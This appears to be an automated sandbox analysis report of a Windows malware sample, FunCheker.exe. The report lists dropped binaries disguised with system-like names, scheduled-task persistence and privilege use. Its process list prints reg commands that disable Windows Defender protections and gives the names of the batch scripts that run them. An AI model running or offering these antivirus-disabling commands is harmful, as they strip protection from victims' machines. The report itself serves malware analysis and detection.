Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1705699165-553239100-4129523827-1000\{03B65D90-6E45-4BD2-9E62-6DFEC28F04A9} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
N/A N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
N/A N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
N/A N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
N/A N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
N/A N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
N/A N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
N/A N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
N/A N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
Token: SeDebugPrivilege N/A C:\Recovery\WindowsRE\SppExtComObj.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\ja-JP\msedge.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Windows Security\BrowserCore\en-US\WmiPrvSE.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1356 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
PID 1356 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
PID 1356 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe
PID 1356 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 1356 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 1356 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 1356 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 1356 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 1356 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\FunCheker.exe C:\Windows\system32\cmd.exe
PID 4608 wrote to memory of 1948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 4608 wrote to memory of 1948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 872 wrote to memory of 704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 4408 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 4408 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 5116 wrote to memory of 396 N/A C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe C:\Windows\SysWOW64\WScript.exe
PID 5116 wrote to memory of 396 N/A C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe C:\Windows\SysWOW64\WScript.exe
PID 5116 wrote to memory of 396 N/A C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe C:\Windows\SysWOW64\WScript.exe
PID 872 wrote to memory of 1172 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1172 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 3920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 3920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 4984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 4984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1276 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1276 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 5072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 5072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 5108 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 5108 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 2280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 2280 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 2952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 2952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1100 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 3936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 872 wrote to memory of 3936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 872 wrote to memory of 1624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 872 wrote to memory of 1624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 872 wrote to memory of 4960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 872 wrote to memory of 4960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 872 wrote to memory of 3784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 872 wrote to memory of 3784 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 872 wrote to memory of 2072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 872 wrote to memory of 2072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 872 wrote to memory of 1324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 1376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 4636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 872 wrote to memory of 4636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\FunCheker.exe

"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"

C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe

"C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker .bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe"

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

